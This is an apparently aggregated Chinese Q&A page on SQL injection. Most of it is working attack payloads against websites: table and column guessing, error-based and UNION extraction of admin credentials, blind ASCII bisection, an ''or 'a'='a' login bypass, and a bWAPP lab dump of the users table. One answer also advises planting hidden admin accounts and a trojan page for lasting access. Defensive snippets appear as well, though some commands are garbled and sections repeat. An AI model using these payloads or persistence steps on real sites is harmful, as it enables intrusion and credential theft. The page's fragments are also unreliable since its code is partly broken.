❶ ES导致sql注入的方式
SQL注入方法
方法1
先猜表名
And (Select count(*) from 表名)<>0
猜列名
And (Select count(列名) from 表名)<>0
或者也可以这样
and exists (select * from 表名)
and exists (select 列名 from 表名)
返回正确的,那么写的表名或列名就是正确
这里要注意的是,exists这个不能应用于猜内容上,例如and exists (select len(user) from admin)>3 这样是不行的
很多人都是喜欢查询里面的内容,一旦iis没有关闭错误提示的,那么就可以利用报错方法轻松获得库里面的内容
获得数据库连接用户名:;and user>0
方法2
后台身份验证绕过漏洞
验证绕过漏洞就是'or'='or'后台绕过漏洞,利用的就是AND和OR的运算规则,从而造成后台脚本逻辑性错误
例如管理员的账号密码都是admin,那么再比如后台的数据库查询语句是
user=request("user")
passwd=request("passwd")
sql='select admin from adminbate where user='&'''&user&'''&' and passwd='&'''&passwd&'''
那么我使用'or 'a'='a来做用户名密码的话,那么查询就变成了
select admin from adminbate where user=''or 'a'='a' and passwd=''or 'a'='a'
这样的话,根据运算规则,这里一共有4个查询语句,那么查询结果就是 假or真and假or真,先算and 再算or,最终结果为真,这样就可以进到后台了
这种漏洞存在必须要有2个条件,第一个:在后台验证代码上,账号密码的查询是要同一条查询语句,也就是类似
sql="select * from admin where username='"&username&'&"passwd='"&passwd&'
如果一旦账号密码是分开查询的,先查帐号,再查密码,这样的话就没有办法了。
第二就是要看密码加不加密,一旦被MD5加密或者其他加密方式加密的,那就要看第一种条件有没有可以,没有达到第一种条件的话,那就没有戏了
❷ PHP网站怎么sql注入有没有破解防御的方法
网站的运行安全肯定是每个站长必须考虑的问题,大家知道,大多数黑客攻击网站都是采用sql注入,这就是我们常说的为什么最原始的静态的网站反而是最安全的。 今天我们讲讲PHP注入的安全规范,防止自己的网站被sql注入。
如今主流的网站开发语言还是php,那我们就从php网站如何防止sql注入开始说起:
Php注入的安全防范通过上面的过程,我们可以了解到php注入的原理和手法,当然我们也同样可以制定出相应该的防范方法:
首先是对服务器的安全设置,这里主要是php+mysql的安全设置和linux主机的安全设置。对php+mysql注射的防范,首先将magic_quotes_gpc设置为On,display_errors设置为Off,如果id型,我们利用intval()将其转换成整数类型,如代码:
$id=intval($id);
mysql_query=”select *from example where articieid=’$id’”;或者这样写:mysql_query(”SELECT * FROM article WHERE articleid=”.intval($id).”")
如果是字符型就用addslashes()过滤一下,然后再过滤”%”和”_”如:
$search=addslashes($search);
$search=str_replace(“_”,”\_”,$search);
$search=str_replace(“%”,”\%”,$search);
当然也可以加php通用防注入代码:
/*************************
PHP通用防注入安全代码
说明:
判断传递的变量中是否含有非法字符
如$_POST、$_GET
功能:
防注入
**************************/
//要过滤的非法字符
$ArrFiltrate=array(”‘”,”;”,”union”);
//出错后要跳转的url,不填则默认前一页
$StrGoUrl=”";
//是否存在数组中的值
function FunStringExist($StrFiltrate,$ArrFiltrate){
foreach ($ArrFiltrate as $key=>$value){
if (eregi($value,$StrFiltrate)){
return true;
}
}
return false;
}
//合并$_POST 和 $_GET
if(function_exists(array_merge)){
$ArrPostAndGet=array_merge($HTTP_POST_VARS,$HTTP_GET_VARS);
}else{
foreach($HTTP_POST_VARS as $key=>$value){
$ArrPostAndGet[]=$value;
}
foreach($HTTP_GET_VARS as $key=>$value){
$ArrPostAndGet[]=$value;
}
}
//验证开始
foreach($ArrPostAndGet as $key=>$value){
if (FunStringExist($value,$ArrFiltrate)){
echo “alert(/”Neeao提示,非法字符/”);”;
if (empty($StrGoUrl)){
echo “history.go(-1);”;
}else{
echo “window.location=/”".$StrGoUrl.”/”;”;
}
exit;
}
}
?>
/*************************
保存为checkpostandget.php
然后在每个php文件前加include(“checkpostandget.php“);即可
**************************/
另外将管理员用户名和密码都采取md5加密,这样就能有效地防止了php的注入。
还有服务器和mysql也要加强一些安全防范。
对于linux服务器的安全设置:
加密口令,使用“/usr/sbin/authconfig”工具打开密码的shadow功能,对password进行加密。
禁止访问重要文件,进入linux命令界面,在提示符下输入:
#chmod 600 /etc/inetd.conf //改变文件属性为600
#chattr +I /etc/inetd.conf //保证文件属主为root
#chattr –I /etc/inetd.conf // 对该文件的改变做限制
禁止任何用户通过su命令改变为root用户
在su配置文件即/etc/pam.d/目录下的开头添加下面两行:
Auth sufficient /lib/security/pam_rootok.so debug
Auth required /lib/security/pam_whell.so group=wheel
删除所有的特殊帐户
#userdel lp等等 删除用户
#groupdel lp等等 删除组
禁止不使用的suid/sgid程序
#find / -type f \(-perm -04000 - o –perm -02000 \) \-execls –lg {} \;
❸ sql注入的注入方法
先猜表名
And (Select count(*) from 表名)<>0
猜列名
And (Select count(列名) from 表名)<>0
或者也可以这样
and exists (select * from 表名)
and exists (select 列名 from 表名)
返回正确的,那么写的表名或列名就是正确
这里要注意的是,exists这个不能应用于猜内容上,例如and exists (select len(user) from admin)>3 这样是不行的
很多人都是喜欢查询里面的内容,一旦iis没有关闭错误提示的,那么就可以利用报错方法轻松获得库里面的内容
获得数据库连接用户名:;and user>0
这个是小竹提出来的,我这里引用《SQL注入天书》里面的一段话来讲解:
重点在and user>0,我们知道,user是SQLServer的一个内置变量,它的值是当前连接的用户名,类型为nvarchar。拿一个 nvarchar的值跟int的数0比较,系统会先试图将nvarchar的值转成int型,当然,转的过程中肯定会出错,SQLServer的出错提示是:将nvarchar转换int异常,XXXX不能转换成int
看到这里大家明白了吧,报错的原理就是利用SQLserver内置的系统表进行转换查询,转换过程会出错,然后就会显示出在网页上,另外还有类似的and 1=(selet top 1 user from admin),这种语句也是可以爆出来的。;and db_name()>0 则是暴数据库名。
一旦关闭了IIS报错,那么还可以用union(联合查询)来查内容,主要语句就是
Order by 10
And 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin
And 1=2 union select 1,2,3,user,5,passwd,7,8,9,10 from admin
上面的order by 10主要就是查字段数目,admin就是表名,可以自己猜,user,passwd是列名
反正就是返回正确即对,返回异常即错
另外还有十分常用的ASCII码拆半法
先要知道指定列名,例如user里的内容的长度
and (select len(user) from admin)=2 就是查询长度为不为2位,返回错误的增加或减少数字,一般这个数字不会太大,太大的就要放弃了,猜也多余
后面的逻辑符号可以根据不同要求更改的,
>;大于 <;小于 =就是等于咯,更新语句的话,=也可以表示传递符号 <>;就是不等
知道了长度后就可以开始猜解了
And (Select top 1 asc(mid(user,n,1)) from admin)>100
n就是猜解的表名的第几位,最后的长度数字就是刚才猜解出来的列名长度了,And (Select top 1 asc(mid(user,1,1)) from admin)>100 就是猜解user里内容的第一位的ASCII字符是不是大于100
正确的话,那么表示USER第一个字符的ASCII码大于100,那么就猜>120,返回错误就是介于100-120之间,然后再一步一步的缩少,最终得到正确字符XXX,然后用ASCII转换器吧这个转换成普通字符就可以了
然后就是第二位 And (Select top 1 asc(mid(user,2,1)) from admin)>100 一直猜下去
加在url后面,列名表名还是先猜解,返回正确的代表帐号的ASCII码大于100,那么就再向前猜,直到报错,把猜出来的ASCII码拿去ASCII转换器转换就可以了,中文是负数,加上asb取绝对值
And (Select top 1 asb(asc(mid(user,n,1))) from admin)>15320
得到之后就记得在数字前加-号,不然ASCII转换器转换不来的,中文在ASCII码里是-23423这样的,所以猜起来挺麻烦
这个猜解速度比较慢,但是效果最好,最具有广泛性 后台身份验证绕过漏洞
验证绕过漏洞就是'or'='or'后台绕过漏洞,利用的就是AND和OR的运算规则,从而造成后台脚本逻辑性错误
例如管理员的账号密码都是admin,那么再比如后台的数据库查询语句是
user=request(user)
passwd=request(passwd)
sql='select admin from adminbate where user='&'''&user&'''&' and passwd='&'''&passwd&'''
那么我使用'or 'a'='a来做用户名密码的话,那么查询就变成了
select admin from adminbate where user=''or 'a'='a' and passwd=''or 'a'='a'
这样的话,根据运算规则,这里一共有4个查询语句,那么查询结果就是 假or真and假or真,先算and 再算or,最终结果为真,这样就可以进到后台了
这种漏洞存在必须要有2个条件,第一个:在后台验证代码上,账号密码的查询是要同一条查询语句,也就是类似
sql=select * from admin where username='&username&'&passwd='&passwd&'
如果一旦账号密码是分开查询的,先查帐号,再查密码,这样的话就没有办法了。
第二就是要看密码加不加密,一旦被MD5加密或者其他加密方式加密的,那就要看第一种条件有没有可以,没有达到第一种条件的话,那就没有戏了 防御方法
对于怎么防御SQL注入呢,这个网上很多,我这里讲几个
如果自己编写防注代码,一般是先定义一个函数,再在里面写入要过滤的关键词,如select ; “”;from;等,这些关键词都是查询语句最常用的词语,一旦过滤了,那么用户自己构造提交的数据就不会完整地参与数据库的操作。
当然如果你的网站提交的数据全部都是数字的,可以使用小竹提供的方法
Function SafeRequest(ParaName,ParaType)
'--- 传入参数 ---
'ParaName:参数名称-字符型
'ParaType:参数类型-数字型(1表示以上参数是数字,0表示以上参数为字符)
Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write 参数 & ParaName & 必须为数字型!
Response.end
End if
Else
ParaValue=replace(ParaValue,','')
End if
SafeRequest=ParaValue
End function
然后就用SafeRequest()来过滤参数 ,检查参数是否为数字,不是数字的就不能通过。 SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况。能不能根据具体情况进行分析,构造巧妙的SQL语句,从而成功获取想要的数据,是高手与“菜鸟”的根本区别。
❹ SQL注入取得16位管理员密码是MD5么
据说MD5是不可逆转的加密方式,得到了一个MD5密码,没什么作用的.
❺ SQL注入之GET型(search)
我们进行测试这里是否存在SQL注入漏洞
输入a'
点击搜索后
报错了,说明很大可能存在SQL注入漏洞了。
order by 语句
输入 a' order by 1 #
输入a' order by 7#
输入a' order by 8#
由此可以判断出,库中有7个列。
使用联合查询注入union
输入a' union select 1,2,3,4,5,6,7#
可以看出是从2开始显示。
可以将2,3,5,4,替换成我们想要查询的信息
system_user() 系统用户名
user() 用户名
current_user 当前用户名
session_user() 连接数据库的用户名
database() 数据库名
version() MYSQL数据库版本
load_file() MYSQL读取本地文件的函数
@@datadir 读取数据库路径
@@basedir MYSQL 安装路径
@@version_compile_os 操作系统
输入a' union select 1,database(),3,4,5,6,7#
可见当前数据库为bwapp
输入a' union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database()#
当前数据库(bwapp)中,有五张表,其中users比较重要。
先查看users表的所有的列的信息
输入a' union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users'#
一共有9列。
其中的login和password,应该是我们有我们想要的东西。
那我们就去查出它们的信息
输入a' union select 1,login,password,4,5,6,7 from users#
获取login信息和password密码
其中密码是经过md5加密,我们需要去解密
❻ 怎么修改语句防sql注入攻击,我想把密码换成列表的形式,怎么操作
用户名规则定为只能英文、数字,不支持特殊符号;用sql检查前先过滤用户名中的特殊字符。
密码在数据库中应该为md5形式,注册的时候就将明文密码md5后存储在库中。
在sql验证前先将输入的密码用md5函数转换一下,这样出来的md5串都是合法字符不会干扰sql语句。数据库用md5形式存密码也防止密码泄露。
搜搜 密码+盐 md5
不要相信任何能提交的东西,全要过滤一遍。所有过滤、校验都在后台,靠前台js是拦不住curl伪造的。
❼ sql注入漏洞如何修复
一、打开domain4.1,在旁注检测—”当前路径”中输入服务器的域名或IP地址。
❽ 扫描发现一个SQL注入,请问如何验证这个注入,请给我详细过程,谢谢,好的话还可以加分
扫描是如何进行的,验证是否存在也是一样的!
扫描是用某一地址后加上了and 1=1取得的结果进行与and 1=2取得的结果进行比较而确认存在的!有时直接可以对and 1=2进行分析.如果内容没有显示完或是显示有部分错误时,一般会报数据库错误!可以知道这存在一个SQL 注入的!
然后就是直接的注入了!以手动为例,第一步猜表名:使用(select count(*) from admin)>0将语句中的1=2代替,查看反回结果,若是与1=2的界面一样出现错误或是显示不完全,则说明不存在admin表,一步一步到试表名,常用的一般是admin,administrator,manager等表名的!
第二步从猜到的表名中猜列名
(select count(*) from admin where len(username)>=1)>0
如果显示完全则表明存在username列名,当然还要猜一个密码的列名,一个是user,username之类,密码是password之类.
第三步,从猜到的表名或列名中猜管理员的名称.
如果是论坛的形式,有些设计上有不好的地方,就是管理员在论坛中发言的那个名称往往就是管理员的名称,因为图省事,发言所用的昵称与登陆所用的用户名是同一个.如果是,则好办,否则也是猜的!
一般我会找一个最长的管理员名称猜或者先猜出长度!如:len(username)>=5时正常,而大于等于6时出错!那么长度一定是5位!
然后用
(select count(*) from admin where len(username)=5 and left(username,1)>='a')>0
出错则第一个字符小于a,根据字符的编码去猜吧,可以找到猜到left(username,1)>="A"时正常,而>="B"时不正常.那么第一个字符就是"A",直到5个都猜完,比如得到"Admin"就知道了其用户名!
第四步猜密码:
(select count(*) from admin where username ='Admin' and left(password,1)>='a')>0
同样的方式可以猜到密码,最好先猜一下密码长度,如果是16位或是32位时往往使用了MD5加密,猜到的是加密过的字符而不是真正的密码!
第五步,其实第五步也是提前确认的,不然我们作的都是无用功!找后台登陆页面.
在后台登陆,当然如果网站为了安全,使用了JS先对密码进行加密的话,可以让JS不运行或是下载页面进行改造,不让其加密你的密码,这时你可以在密码中直接输入第四步的MD5的值.如果密码是明文传播,也就是在服务器端进行校验时,只有将第四步得到的MD5匹配,不叫反解MD不能反解,但可以在网站上得到一个匹配,也就是说某一个密码可以生成同样的MD5值,那这个密码就可以用!当然,如果明文存在数据库中就更好玩了!直接输入吧!
第六步,进入后台后,添加管理员帐户!以后想怎么玩就怎么玩,要是一个不细心的网管,再不查一下后台的管理员,你想他的后果是什么?
第七步,可能吗?大部分的管理员不是弱智,所以第六步往往只是一个障眼法!因为添加管理员很容易被发现的!添加木马程序!或者写一个页面,这个页面的名字与地址你自己记好,然后隐藏,一般管理员都不会在意的!这个页面是显示其特定数据库的!你也想了显示哪个呢?肯定管理员了!
以后你也登陆,如果添加的帐户登陆不上,就调用那个隐藏的地址,显示出真正管理员的密码或是MD5值,同上边一样登陆进行!再建一个管理员迷惑他!
当然,如果数据库允许插入的话,也好玩!不必狂管理员的帐户与密码,直接使用insert into语句插入一个管理员和密码就可以了!但是由于admin表中除这两项外,还有不允许为空时我们要么再猜其他字段(这个很难),很难插入的!
如果是SQL数据库,而他们开的恰恰又是sa帐户的话,好玩的事更多了!因为sa的权限很大,直接可以从系统表中查询各个表的名称等,
这只是手动的一个例子,做为新手可以实现注入.但记着不要给人家网站添麻烦,都不容易!
❾ SQL注入的一般过程如何
方法1先猜表名 And (Select count(*) from 表名)<>0 猜列名 And (Select count(列名) from 表名)<>0 或者也可以这样 and exists (select * from 表名) and exists (select 列名 from 表名) 返回正确的,那么写的表名或列名就是正确 这里要注意的是,exists这个不能应用于猜内容上,例如and exists (select len(user) from admin)>3 这样是不行的 现在很多人都是喜欢查询里面的内容,一旦iis没有关闭错误提示的,那么就可以利用报错方法轻松获得库里面的内容 获得数据库连接用户名:;and user>0 这个是小竹提出来的,我这里引用《SQL注入天书》里面的一段话来讲解: ---------------------------------------------"重点在and user>0,我们知道,user是SQLServer的一个内置变量,它的值是当前连接的用户名,类型为nvarchar。拿一个 nvarchar的值跟int的数0比较,系统会先试图将nvarchar的值转成int型,当然,转的过程中肯定会出错,SQLServer的出错提示是:将nvarch" ---------------------------------------------看到这里大家明白了吧,报错的原理就是利用SQLserver内置的系统表进行转换查询,转换过程会出错,然后就会显示出在网页上,另外还有类似的and 1=(selet top 1 user from admin),这种语句也是可以爆出来的。;and db_name()>0 则是暴数据库名。 一旦关闭了IIS报错,那么还可以用union(联合查询)来查内容,主要语句就是 Order by 10 And 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin And 1=2 union select 1,2,3,user,5,passwd,7,8,9,10 from admin 上面的order by 10主要就是查字段数目,admin就是表名,可以自己猜,user,passwd是列名 反正就是返回正确即对,返回异常即错 另外还有十分常用的ascll码拆半法 先要知道指定列名,例如user里的内容的长度 and (select len(user) from admin)=2 就是查询长度为不为2位,返回错误的增加或减少数字,一般这个数字不会太大,太大的就要放弃了,猜也多余 后面的逻辑符号可以根据不同要求更改的, >大于 <小于 =就是等于咯,更新语句的话,=也可以表示传递符号 <>就是不等 知道了长度后就可以开始猜解了 And (Select top 1 asc(mid(user,n,1)) from admin)>100 n就是猜解的表名的第几位,最后的长度数字就是刚才猜解出来的列名长度了,And (Select top 1 asc(mid(user,1,1)) from admin)>100 就是猜解user里内容的第一位的ASCLL字符是不是大于100 正确的话,那么表示USER第一个字符的ASCLL码大于100,那么就猜>120,返回错误就是介于100-120之间,然后再一步一步的缩少,最终得到正确字符XXX,然后用ASCLL转换器吧这个转换成普通字符就可以了 然后就是第二位 And (Select top 1 asc(mid(user,2,1)) from admin)>100 一直猜下去 加在url后面,列名表名还是先猜解,返回正确的代表帐号的ascll码大于100,那么就再向前猜,指导报错,把猜出来的ascll码拿去ascll转换器转换就可以了,中文是负数,加上asb取绝对值 And (Select top 1 asb(asc(mid(user,n,1))) from admin)>15320 得到之后就记得在数字前加-号,不然ASCLL转换器转换不来的,中文在ASCLL码里是-23423这样的,所以猜起来挺麻烦 这个猜解速度比较慢,但是效果最好,最具有广泛性 方法2后台身份验证绕过漏洞 验证绕过漏洞就是'or'='or'后台绕过漏洞,利用的就是AND和OR的运算规则,从而造成后台脚本逻辑性错误 例如管理员的账号密码都是admin,那么再比如后台的数据库查询语句是 user=request("user") passwd=request("passwd") sql='select admin from adminbate where user='&'''&user&'''&' and passwd='&'''&passwd&''' 那么我使用'or 'a'='a来做用户名密码的话,那么查询就变成了 select admin from adminbate where user=''or 'a'='a' and passwd=''or 'a'='a' 这样的话,根据运算规则,这里一共有4个查询语句,那么查询结果就是 假or真and假or真,先算and 再算or,最终结果为真,这样就可以进到后台了 这种漏洞存在必须要有2个条件,第一个:在后台验证代码上,账号密码的查询是要同一条查询语句,也就是类似 sql="select * from admin where username='"&username&'&"passwd='"&passwd&' 如果一旦账号密码是分开查询的,先查帐号,再查密码,这样的话就没有办法了。 第二就是要看密码加不加密,一旦被MD5加密或者其他加密方式加密的,那就要看第一种条件有没有可以,没有达到第一种条件的话,那就没有戏了 方法3防御方法 对于怎么防御SQL注入呢,这个网上很多,我这里讲几个 如果自己编写防注代码,一般是先定义一个函数,再在里面写入要过滤的关键词,如select ; “”;form;等,这些关键词都是查询语句最常用的词语,一旦过滤了,那么用户自己构造提交的数据就不会完整地参与数据库的操作。 当然如果你的网站提交的数据全部都是数字的,可以使用小竹提供的方法 Function SafeRequest(ParaName,ParaType) '--- 传入参数 --- 'ParaName:参数名称-字符型 'ParaType:参数类型-数字型(1表示以上参数是数字,0表示以上参数为字符) Dim ParaValue ParaValue=Request(ParaName) If ParaType=1 then If not isNumeric(ParaValue) then Response.write "参数" & ParaName & "必须为数字型!" Response.end End if Else ParaValue=replace(ParaValue,"'","''") End if SafeRequest=ParaValue End function 然后就用SafeRequest()来过滤参数,检查参数是否为数字,不是数字的就不能通过。